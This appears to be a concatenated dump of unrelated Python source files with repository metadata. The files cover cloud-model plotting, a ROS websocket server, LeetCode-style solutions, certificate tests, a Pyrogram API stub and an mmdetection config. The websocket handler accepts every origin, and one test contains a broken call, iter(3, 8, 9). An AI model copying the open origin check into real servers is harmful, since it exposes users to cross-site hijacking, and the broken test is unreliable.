air_2ds = ra.read_in_nc_variables(rl.air_2ds_file,rl.air_2ds_var)
air_alt = ra.read_in_nc_variables(rl.air_alt_file,rl.air_alt_var)
air_iwc = ra.read_in_nc_variables(rl.air_iwc_file,rl.air_iwc_var)
air_lwc = ra.read_in_nc_variables(rl.air_lwc_file,rl.air_lwc_var)
air_temp = ra.read_in_nc_variables(rl.air_temp_file,rl.air_temp_var)
print len(air_up)
data_path = sys.argv[1]
model_path = data_path
TWC = ra.read_in_nc_variables(data_path+rl.TWC_3D_file,rl.TWC_3D_var)
TWC = TWC*1000
updrafts = ra.read_in_nc_variables(data_path+rl.UPDRAFT_3D_file,rl.UPDRAFT_3D_var)
print len(updrafts)
CDNC = ra.read_in_nc_variables(data_path+rl.CDNC_3D_file,rl.CDNC_3D_var)
CDNC = CDNC*1e-6
IWC = ra.read_in_nc_variables(data_path+rl.IWC_3D_file,rl.IWC_3D_var)
IWC=IWC*1000
LWC = ra.read_in_nc_variables(data_path+rl.LWC_3D_file,rl.LWC_3D_var)
LWC=LWC*1000
ALT = ra.read_in_nc_variables(data_path+rl.ALT_3D_file,rl.ALT_3D_var)
TEMP = ra.read_in_nc_variables(data_path+rl.TEMP_3D_file,rl.TEMP_3D_var)
ICE_NUMBER = ra.read_in_nc_variables(data_path+rl.ICE_NUMBER_3D_file,rl.ICE_NUMBER_3D_var)
ICE_NUMBER = ICE_NUMBER*1e-6
GRAUPEL_NUMBER = ra.read_in_nc_variables(data_path+rl.GRAUPEL_NUMBER_3D_file,rl.GRAUPEL_NUMBER_3D_var)
GRAUPEL_NUMBER = GRAUPEL_NUMBER*1e-6
SNOW_NUMBER = ra.read_in_nc_variables(data_path+rl.SNOW_NUMBER_3D_file,rl.SNOW_NUMBER_3D_var)
SNOW_NUMBER = SNOW_NUMBER*1e-6
TOTAL_ICE_NUMBER = ICE_NUMBER+GRAUPEL_NUMBER+SNOW_NUMBER
CDNC_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_DROPLET_NUMBER_2D_file, rl.CLOUD_BASE_DROPLET_NUMBER_var)
CDNC_cloud_base = CDNC_cloud_base*1e-6
updraft_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_UPDRAFT_2D_file, rl.CLOUD_BASE_UPDRAFT_var)
ra.plot_1d_histogram_aircraft_and_model(air_up,updrafts,'Updraft Speed (m/s)', 'Updrafts_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC,'CDNC (/cm^3)', 'CDNC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC_cloud_base,'CDNC at cloud base (/cm^3)', 'CDNC_at_cloud_base_1D_histogram_new_RC_data', model_path)
TWC[TWC>3]=0
TWC[TWC==0]=np.nan
TWC = TWC[~np.isnan(TWC)]
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data_3gperkg_limit', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_lwc,LWC,'LWC (g/kg)', 'LWC_CDP_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_iwc,IWC,'IWC (g/kg)', 'IWC_NEVZOROV_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'ICE_CRYSTAL_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'TOTAL_ICE_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER[ALT<8000],'Ice number / 2ds count (<8000m) (/cm^3)', 'TOTAL_ICE_NUMBER_model_under_8000m_1D_histogram_new_RC_data', model_path)
|
[
"rhawker@sci2.jasmin.ac.uk"
] |
rhawker@sci2.jasmin.ac.uk
|
83c8ab86e6e3a8b6764880c6ff5d8c569fa8a7b8
|
2612f762ec75a0723a4d12ae1d63a30792e4c236
|
/src/websocket_server/src/ws_ros.py~
|
f804ffdceb5f6c972b0265f5cf2bc6bfa41642a3
|
[] |
no_license
|
aransena/catkin_ws
|
efdf1a52b7dbbefbfa9cb748630f7be1ffd7f628
|
eae6b83c80803a718a8e41569d3b4e7c1c838926
|
refs/heads/master
| 2021-01-18T21:12:48.557260
| 2016-06-03T13:39:22
| 2016-06-03T13:39:22
| 52,208,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,602
|
#!/usr/bin/env python
# sample code from http://iot-projects.com/index.php?id=websocket-a-simple-example
import rospy
from std_msgs.msg import String as ros_string
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import json
pub = rospy.Publisher('websocket_server_msgs', ros_string)
outfile = open('data.txt', 'w')
class WSHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
print 'user is connected.\n'
def on_message(self, message):
print message
if len(message) > 10:
msg = json.loads(message)
json.dump(msg, outfile)
#print 'received message: %s\n' % json.loads(message)
pub.publish(str(message))
if message == "USER":
print "Responding..."
self.write_message(message) # + ' OK')
def on_close(self):
print 'connection closed\n'
application = tornado.web.Application([(r'/ws', WSHandler), ])
if __name__ == "__main__":
try:
pub = rospy.Publisher('websocket_server_msgs', ros_string)
rospy.init_node('websocket_server', anonymous=True)
rospy.loginfo("websocket_server started")
http_server = tornado.httpserver.HTTPServer(application)
try:
print(2)
#http_server.close_all_connections()
print(3)
except:
pass
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except Exception,e:
print "Server Error ", e
pass
|
[
"aransena@gmail.com"
] |
aransena@gmail.com
|
|
31e398f160b1e7e9561e782bfa7d7d1eb3c10ec1
|
dea48ecac82d241e7960f52794eb8a29e5d2e428
|
/jianzhioffer/二叉树/字符串验证是否树的前序遍历.py
|
0947369b674e63e6e19fb50a48bf9bcedce51ce0
|
[] |
no_license
|
yxx94/2020-
|
e2302bed32c5d7d1e8b559ef378fc60408687934
|
e63431cfc3d8c8903bb383144dd0c5ed5d71aa5c
|
refs/heads/master
| 2020-09-03T09:04:08.795099
| 2019-09-19T08:12:51
| 2019-09-19T08:12:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# coding=utf-8
# 字符串验证是否树的前序遍历
'''
//遍历一边str[]
//如果不是"#"就会多出一个叶子结点,如果是"#"就会减少一个叶子结点
输入: "9,3,4,#,#,1,#,#,2,#,6,#,#"
输出: true
'''
class Solution(object):
def isValidSerialization(self, preorder):
res = 1 # 叶节点的个数
for val in preorder.split(','):
if not res:
return False
if val == "#":
res -= 1
else:
res += 1
return not res
s = Solution()
print(s.isValidSerialization('9,3,4,#,#,1,#,#,2,#,6,#,#'))
|
[
"jiachen0212@163.com"
] |
jiachen0212@163.com
|
2eed8db45422d9c88538efb423a9a4754c1887e2
|
3a21faa925e8a21ad5e0d6dedf3037cc52750cbd
|
/datasciencebox/tests/test_cluster.py
|
89b93a7e9fa3876d1158ec3b5b928d7a7a92c6fe
|
[
"Apache-2.0"
] |
permissive
|
yabebalFantaye/datasciencebox
|
9e630f9ad9139a609d9d925ce4a3f29467bf661f
|
9f57ae85a034357d5bc15a12f3ebd15930f33ff1
|
refs/heads/master
| 2021-01-15T18:14:01.730969
| 2015-09-06T05:42:23
| 2015-09-06T05:42:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 693
|
py
|
import pytest
from datasciencebox.core.settings import Settings
from datasciencebox.core.cloud.cluster import Cluster
settings = Settings()
def test_cluster_from_to_list():
data = [{'id': 0, 'ip': '0.0.0.0'}, {'id': 1, 'ip': '1.1.1.1'}, {'id': 2, 'ip': '2.2.2.2'}]
cluster = Cluster.from_list(data, settings)
exported = cluster.to_list()
exported_ans = [{'id': 0,
'ip': '0.0.0.0'}, {'id': 1,
'ip': '1.1.1.1'}, {'id': 2,
'ip': '2.2.2.2'}]
assert isinstance(exported, list)
assert exported == exported_ans
assert len(cluster.instances) == 3
|
[
"df.rodriguez143@gmail.com"
] |
df.rodriguez143@gmail.com
|
6e21f862d7e958f80ed264d9ffd7489494b638db
|
d9f52125601ec26f79202f0e912891b31b60ffc4
|
/오후반/Sets/3_Set_union_Operation/3_Set_union_Operation_LGY.py
|
c79cb4088243b817c276b33d76d8101e5cfec87e
|
[] |
no_license
|
YoungGaLee/2020_Python_coding-study
|
5a4f36a39021c89ac773a3a7878c44bf8b0b811f
|
b876aabc747709afa21035c3afa7e3f7ee01b26a
|
refs/heads/master
| 2022-12-12T13:34:44.729245
| 2020-09-07T04:07:48
| 2020-09-07T04:07:48
| 280,745,587
| 4
| 4
| null | 2020-07-22T03:27:22
| 2020-07-18T21:51:40
|
Python
|
UTF-8
|
Python
| false
| false
| 135
|
py
|
first = int(input())
A = set(input().split())
second = int(input())
B = set(input().split())
result = A.union(B)
print(len(result))
|
[
"noreply@github.com"
] |
YoungGaLee.noreply@github.com
|
78e205ae750a4be5a068a55c9c559e1374f631e3
|
03a2c1eb549a66cc0cff72857963eccb0a56031d
|
/hacker_rank/domains/algorithms/sorting/almost-sorted_sunghyo.jung.py
|
0264ebbc94a8388fd6ffbfafa0b6f4d7256e3e34
|
[] |
no_license
|
nobe0716/problem_solving
|
c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59
|
cd43dc1eddb49d6b5965419e36db708c300dadf5
|
refs/heads/master
| 2023-01-21T14:05:54.170065
| 2023-01-15T16:36:30
| 2023-01-15T16:36:30
| 80,906,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 689
|
py
|
n = int(input())
ar = map(int, raw_input().split())
d = []
for i in range(1, n):
if ar[i] < ar[i - 1]:
d.append(i)
if len(d) == 1:
a, b = d[0] - 1, d[0]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
elif len(d) == 2:
a, b = d[0] - 1, d[1]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
else:
a = d[0] - 1
b = d[len(d) - 1]
if b - a != len(d):
print("no")
else:
print("yes")
print("reverse %d %d" % (a + 1, b + 1))
|
[
"sunghyo.jung@navercorp.com"
] |
sunghyo.jung@navercorp.com
|
70bbe8208649b16729cf28e1e4a6518b00610e12
|
0617c812e9bf58a2dbc1c1fef35e497b054ed7e4
|
/venv/Lib/site-packages/pyrogram/raw/functions/account/check_username.py
|
d280838035783c8751c6caf5d199e15af0b780fc
|
[] |
no_license
|
howei5163/my_framework
|
32cf510e19a371b6a3a7c80eab53f10a6952f7b2
|
492c9af4ceaebfe6e87df8425cb21534fbbb0c61
|
refs/heads/main
| 2023-01-27T14:33:56.159867
| 2020-12-07T10:19:33
| 2020-12-07T10:19:33
| 306,561,184
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,138
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class CheckUsername(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0x2714d86c``
Parameters:
username: ``str``
Returns:
``bool``
"""
__slots__: List[str] = ["username"]
ID = 0x2714d86c
QUALNAME = "pyrogram.raw.functions.account.CheckUsername"
def __init__(self, *, username: str) -> None:
self.username = username # string
@staticmethod
def read(data: BytesIO, *args: Any) -> "CheckUsername":
# No flags
username = String.read(data)
return CheckUsername(username=username)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
data.write(String(self.username))
return data.getvalue()
|
[
"houwei5163"
] |
houwei5163
|
b7d132d47f8448aeb6077d1264063bf458f2674c
|
e73f0bd1e15de5b8cb70f1d603ceedc18c42b39b
|
/Project Euler/014 - Collatz sequance.py
|
d3aabfadf4ae8c3e4f5527c2ef44622211ca50e0
|
[] |
no_license
|
thran/the_code
|
cbfa3b8be86c3b31f76f6fbd1deb2013d3326a4a
|
ba73317ddc42e10791a829cc6e1a3460cc601c44
|
refs/heads/master
| 2023-01-05T14:39:16.708461
| 2022-12-25T08:37:39
| 2022-12-25T08:37:39
| 160,978,160
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
def next_collatz(n):
if n % 2 == 0:
return n / 2
return 3 * n + 1
def collatz_lenght(n):
if n == 1: return 1
return collatz_lenght(next_collatz(n)) + 1
m = 0
best = 0
for i in range(1, 10**6):
l = collatz_lenght(i)
if m < l:
m = l
best = i
print m, best
|
[
"thran@centrum.cz"
] |
thran@centrum.cz
|
44b80c569089638f50802259a2b208a0acc1f02b
|
ee58b29d8982cc6987b986ee616bc47b6a8d8aa3
|
/python/dcp_367_merge_iterators.py
|
fa15d8ab6be1c94d2399b380055906ae31def2cf
|
[] |
no_license
|
gubenkoved/daily-coding-problem
|
7dd9e0a7ee6606a04cd50fa2766e650da1259f7b
|
ea8b352b1d3d1f44cd0f04ddaadf3e662f4c85bf
|
refs/heads/master
| 2021-07-03T22:31:50.519730
| 2020-09-27T10:28:09
| 2020-09-27T10:28:09
| 172,369,604
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,255
|
py
|
# This problem was asked by Two Sigma.
#
# Given two sorted iterators, merge it into one iterator.
#
# For example, given these two iterators:
#
# foo = iter([5, 10, 15])
# bar = iter([3, 8, 9])
# You should be able to do:
#
# for num in merge_iterators(foo, bar):
# print(num)
#
# # 3
# # 5
# # 8
# # 9
# # 10
# # 15
#
# Bonus: Make it work without pulling in the contents of the iterators in memory.
def merge(*iterators):
# python iterators do NOT allow to get the current value, so we will have
# to have a separate store
values = [next(iterator) for iterator in iterators]
while True:
if not iterators:
return
# pick the smallest
idx, val = min(enumerate(values), key=lambda x: x[1])
# advance the idx-th pointer
try:
iterator = iterators[idx]
values[idx] = next(iterator)
except StopIteration:
# exhausted iterator, remove it!
del iterators[idx]
del values[idx]
yield val
assert list(merge(iter([1, 2, 3]))) == [1, 2, 3]
assert list(merge(iter([5, 10, 15]), iter(3, 8, 9))) == [3, 5, 8, 9, 10, 15]
assert list(merge(iter([10, 20, 30]), iter([15, 25]), iter([17]))) == [10, 15, 17, 20, 25, 30]
|
[
"gubenkoved@gmail.com"
] |
gubenkoved@gmail.com
|
4bd60b2710f545f82a96f3c453c1fe5e6af26c4e
|
6caab8d886e8bd302d1994ff663cf5ccb5e11522
|
/MyNotes_01/Step01/4-CORE/day02_15/demo04.py
|
899097f7197eb4379f74f3afa0259428d5a3dcf2
|
[] |
no_license
|
ZimingGuo/MyNotes01
|
7698941223c79ee754b17296b9984b731858b238
|
55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6
|
refs/heads/master
| 2022-07-30T21:30:32.100042
| 2020-05-19T16:59:09
| 2020-05-19T16:59:09
| 265,254,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
# author: Ziming Guo
# time: 2020/2/24
"""
demo04:
异常处理
练习:exercise03.py
"""
def div_apple(apple_count):
# ValueError
person_count = int(input("请输入人数:"))
# ZeroDivisionError
result = apple_count / person_count
print("每人%d个苹果"%result)
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
"""
"""
# "建议"分门别类的处理
try:
# 可能出错的代码
div_apple(10)
except ValueError:
print("输入的人数必须是整数")
except ZeroDivisionError:
print("输入的人数不能是零")
except Exception: # 这句话一般是写在最后的,以上错误都不属于才会执行这句话
print("未知错误")
"""
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
else:
# 如果异常,不执行else语句.
print("没有出错")
"""
try:
# 可能出错的代码
div_apple(10)
finally:
# 无论是否异常,一定会执行的代码.
print("finally")
# 作用:不能处理的错误,但是一定要执行的代码,就定义到finally语句中。
print("后续逻辑.....")
|
[
"guoziming99999@icloud.com"
] |
guoziming99999@icloud.com
|
dda479fe3985fbe635d716f2b72e44d05c545d36
|
016109b9f052ffd037e9b21fa386b36089b05813
|
/checkTree.py
|
824b6551f6e8aaa158948abc4cfda4bca896f43e
|
[] |
no_license
|
nsshayan/DataStructuresAndAlgorithms
|
9194508c5227c5c8c60b9950917a4ea8da8bbab2
|
2f7ee1bc8f4b53c35d1cce62e898a9695d99540a
|
refs/heads/master
| 2022-09-29T21:15:33.803558
| 2022-09-08T17:14:59
| 2022-09-08T17:14:59
| 73,257,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 308
|
py
|
'''
Given :-
the number of nodes in a graph
the degree of each of the vertices
Find whether the given graph is tree or not
'''
N = int(raw_input())
Degree = raw_input().split(" ")
sum = 0
for i in range(len(Degree)):
sum = sum + int(Degree[i])
if sum/2 == N-1:
print "YES"
else :
print "NO"
|
[
"nsshayan89@gmail.com"
] |
nsshayan89@gmail.com
|
b6faf20877f683beab77c503370315724c92cdac
|
5fb579602489728ac47e195bd15838eb632aece4
|
/tests/test_utils.py
|
99a1fd9fe74c0728ba2a92baf3a1f722c68f4174
|
[
"MIT"
] |
permissive
|
Cesare-Liu/cryptokit
|
6101701f3daec60ce8ca2f8a2bb464a58ccae20e
|
bfb90c229279c3c755bdbedfe659d7d5b6e65b51
|
refs/heads/master
| 2020-03-27T10:38:20.714133
| 2018-06-07T06:15:51
| 2018-06-07T06:15:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
# coding: utf-8
"""test utils."""
from __future__ import unicode_literals
import datetime
from unittest import TestCase
from cryptokit.rsa import RSACrypto
from cryptokit.utils import (load_pfx, generate_certificate, generate_pfx,
get_pubkey_from_pfx)
class UtilTestCase(TestCase):
"""RSACrypto useage test."""
def setUp(self):
private_key = RSACrypto.generate_private_key(2048)
RSACrypto.dump_private_key_pem(private_key)
self.private_key = private_key
self.public_key = private_key.public_key()
validity = datetime.timedelta(days=365)
self.not_valid_before = datetime.datetime.today()
self.not_valid_after = self.not_valid_before + validity
payload = {
'common_name': 'CA',
'country_name': 'CN',
'email_address': 'codingcat@gmail.com',
'org_name': '数字认证中心',
'company_name': '编程猫科技',
'state_or_province': '浙江省',
'locality_name': '杭州市',
'private_key': self.private_key,
'public_key': self.public_key,
'serial_number': 9219100179121295299
}
self.payload = payload
def test_generate_certificate(self):
"""Test generate certificate."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
self.assertEqual(cert.serial_number, self.payload['serial_number'])
def test_generate_pfx(self):
"""Test generate pfx."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
pfx = generate_pfx(
cert, self.payload['company_name'], self.private_key)
pkcs12 = load_pfx(pfx)
self.assertEqual(
cert.serial_number,
pkcs12.get_certificate().get_serial_number()
)
def test_get_pubkey_from_pfx(self):
"""Test get_pubkey_from_pfx."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
pfx_file = generate_pfx(
cert, self.payload['company_name'], self.private_key)
pubkey = get_pubkey_from_pfx(pfx_file, password=None)
self.assertEqual(cert.public_key().public_numbers(),
pubkey.public_numbers())
|
[
"istommao@gmail.com"
] |
istommao@gmail.com
|
d152111c4317b9090484c966da3a4671a305c7de
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02755/s084222637.py
|
a56cd5d0e5b0b0922a2417c7c93736a84b7a05d5
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
a,b=map(int,input().split())
for i in range(100001):
if int(i*0.08) == a and int(i*0.1) == b:
print(i)
break
else:
print(-1)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
76da4859384e1d8a645aaf5c79f6116f3d66c864
|
38c35956be6343855914b1c58b8fbd2e40c6e615
|
/Strings/2023.py
|
449cb787bc1f493dc6d2d3557856b2f76693cf95
|
[] |
no_license
|
LucasBarbosaRocha/URI
|
b43e4f4a6b3beed935f24839001bea354411c4bd
|
2c9bcc13300a9f6243242e483c8f9ec3296a88ad
|
refs/heads/master
| 2020-06-25T05:06:51.297824
| 2019-08-22T04:50:11
| 2019-08-22T04:50:11
| 199,210,037
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 343
|
py
|
lista = []
l = ""
while True:
try:
entrada = input()
l = l + entrada + "+"
except :
break
#print (l)
l = l[:len(l) - 1]
original = l.split("+")
lista = l.lower()
lista = lista.split("+")
lista.sort()
escolhido = lista[len(lista) - 1]
for i in range(len(original)):
if (escolhido == original[i].lower()):
print (original[i])
break
|
[
"lucas.lb.rocha@gmail.com"
] |
lucas.lb.rocha@gmail.com
|
58412d85187532f9f42d4f40e1c022211b03d8f3
|
4e1af52e60dd997fca04be3485e157292cf84b6a
|
/2020/tests/test_day08.py
|
c14b7db55c5cf09e4fcbd77b7364367ebec9a8fd
|
[
"MIT"
] |
permissive
|
JesperDramsch/advent-of-code
|
e0173d4e78cf274ae461b39d619f56a03ef54773
|
ccad3d578be473bf44dea7284c2f99fd67f3271c
|
refs/heads/main
| 2023-01-13T07:18:30.772913
| 2022-12-25T16:12:02
| 2022-12-25T16:39:53
| 160,000,829
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 654
|
py
|
import sys
import pytest
sys.path.insert(0, ".")
from util import Day
from day08 import *
@pytest.fixture(scope="function")
def day():
day = Day(8)
day.load(typing=str)
return day
def test_example(day):
data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
day.load(data, typing=str)
assert main(day, part=1) == 5
def test_example_p2(day):
data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
day.load(data, typing=str)
assert main(day, part=2) == 8
def test_part1(day):
assert main(day, part=1) == 1753
def test_part2(day):
assert main(day, part=2) == 733
|
[
"jesper@dramsch.net"
] |
jesper@dramsch.net
|
b207fefd6ccd6d562f1572e2426380b43b6f1983
|
76563ffc91a6f35ffab2986693f0124a3a3aaf86
|
/Crawler/2-DecisionTreeClassifier.py
|
4f7047571f73169fdfd436414573723cf4d2f024
|
[] |
no_license
|
zelenkastiot/FCSE-Data-Mining
|
ab7aea21402742c518857a1c871d3e0a033f8581
|
6e1ffbada09784bb846af54aefc57fe0eb257a17
|
refs/heads/master
| 2023-02-27T17:14:10.457335
| 2021-02-07T22:13:20
| 2021-02-07T22:13:20
| 289,999,697
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,994
|
py
|
"""
Created on 15-Jan-21
@author: Kiril Zelenkovski
"""
import math
from sklearn.preprocessing import OrdinalEncoder, LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import CategoricalNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
import pandas as pd
# Read csv
dataset = pd.read_csv("dataset.csv")
dataset = dataset.drop("Address Region", 1)
dataset = dataset.drop("Street Address", 1)
dataset = dataset.drop("Address Locality", 1)
dataset = dataset.drop("Postal Code", 1)
dataset = dataset.drop("Price", 1)
dataset = dataset.drop("Beds", 1)
print(dataset)
columns = dataset.columns.tolist()
dataset = dataset.values.tolist()
# Use Ordinal Encoder to encode categorical features as an integer array
encoder = OrdinalEncoder()
encoder.fit([dataset[j][:-1] for j in range(0, len(dataset))])
# Split dataset 75% train, 25% test
# test_csv = dataset[math.ceil(0.75 * len(dataset)):]
# train_csv = dataset[0:math.ceil(0.75 * len(dataset))]
X_dataset = [dataset[j][:-1] for j in range(0, len(dataset))]
y_dataset = [dataset[j][-1] for j in range(0, len(dataset))]
X, X_test, y, y_test = train_test_split(X_dataset,
y_dataset,
test_size=0.2,
random_state=42)
# Call encoder.transform or encoder.fit_transform to transform the data (because it is strings and int)
X = encoder.transform(X)
# Decision Tree Classifier: A non-parametric supervised learning method used for classification
classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)
# Fit Decision Tree Classifier according to X, y
classifier.fit(X, y)
# Call encoder.transform to transform the data
X_test = encoder.transform(X_test)
# Print accuracy using imported metrics
y_predicted = [classifier.predict([x])[0] for x in X_test]
print(f'DecisionTreeClassifier accuracy: {accuracy_score(y_test, y_predicted, normalize=True):.4f}')
# Print depth for classifier
print('Depth:', classifier.get_depth())
# Print # of leaves for classifier
print('Number of leaves:', classifier.get_n_leaves())
# Load importance of features in list
feature_importance = list(classifier.feature_importances_)
# Most and least important feature
most_important_feature = feature_importance.index(max(feature_importance))
least_important_feature = feature_importance.index(min(feature_importance))
# Print both
print('Most important feature:', columns[most_important_feature])
print('Least important feature:', columns[least_important_feature])
print(feature_importance)
for i in range(0, len(feature_importance)):
print(columns[feature_importance.index(feature_importance[i])])
print(y_predicted)
print(y_test)
le = LabelEncoder()
le.fit([dataset[j][-1] for j in range(0, len(dataset))])
list(le.classes_)
y_predicted = le.transform(y_predicted)
y_test = le.transform(y_test)
print(y_predicted)
print(y_test)
|
[
"zelenkastiot@gmail.com"
] |
zelenkastiot@gmail.com
|
2ebbafa1c2d6e457a74cceb59b8ab893eab097ca
|
c5f58af61e3577ded52acda210f4f664651b598c
|
/template/mmdetection/configs/fpg/retinanet_r50_fpg_crop640_50e_coco.py
|
6c517c9bfc6efebd56f35173b33505ea42865e03
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hojihun5516/object-detection-level2-cv-02
|
0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac
|
bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109
|
refs/heads/master
| 2023-08-31T09:50:59.150971
| 2021-10-16T15:00:19
| 2021-10-16T15:00:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,470
|
py
|
_base_ = "../nas_fpn/retinanet_r50_nasfpn_crop640_50e_coco.py"
norm_cfg = dict(type="BN", requires_grad=True)
model = dict(
neck=dict(
_delete_=True,
type="FPG",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
inter_channels=256,
num_outs=5,
add_extra_convs=True,
start_level=1,
stack_times=9,
paths=["bu"] * 9,
same_down_trans=None,
same_up_trans=dict(
type="conv",
kernel_size=3,
stride=2,
padding=1,
norm_cfg=norm_cfg,
inplace=False,
order=("act", "conv", "norm"),
),
across_lateral_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
across_down_trans=dict(
type="interpolation_conv",
mode="nearest",
kernel_size=3,
norm_cfg=norm_cfg,
order=("act", "conv", "norm"),
inplace=False,
),
across_up_trans=None,
across_skip_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
output_trans=dict(type="last_conv", kernel_size=3, order=("act", "conv", "norm"), inplace=False),
norm_cfg=norm_cfg,
skip_inds=[(0, 1, 2, 3), (0, 1, 2), (0, 1), (0,), ()],
)
)
evaluation = dict(interval=2)
|
[
"hojihun5516@daum.net"
] |
hojihun5516@daum.net
|
c89927df7078e8bf390e1f73ca56617223ac32d4
|
cef4f2e3357577bf56d3181dba988d0006d796b9
|
/Projects/CourseInfo/Services/BussinessLogicServices/CourseService-old.py
|
3ecae3d629720953d59c8dacbef0d7c8def24fd4
|
[] |
no_license
|
IshaShah27/E6156F21
|
5256715399f58d5f03dc6b4b8cf8e3920eb55bc7
|
8769203cf61a5ca96d5baa5ad1be34b1031ffffe
|
refs/heads/main
| 2023-08-26T22:07:13.469515
| 2021-10-18T21:31:01
| 2021-10-18T21:31:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,613
|
py
|
import Services.DataAccessServices.CourseWorksAdapter as cw_adapter
class Student():
def __init__(self, context, j_data):
self._context = context
self.id = j_data["id"]
self.user_id = j_data["sis_user_id"]
self.login_id = j_data["login_id"]
name_fields = j_data["sortable_name"].split(",")
self.name = {
"last_name": name_fields[0],
"first_name": name_fields[1]
}
def to_json(self):
result = {}
result["id"] = self.id
result["name"] = self.name
result["user_id"] = self.user_id
result["login_id"] = self.login_id
return result
class Course():
_field_list = ["id", "name", "uuid", "course_code_full", "course_no", "section", "year", "semester"]
def __init__(self, context, j_data):
self._context = context
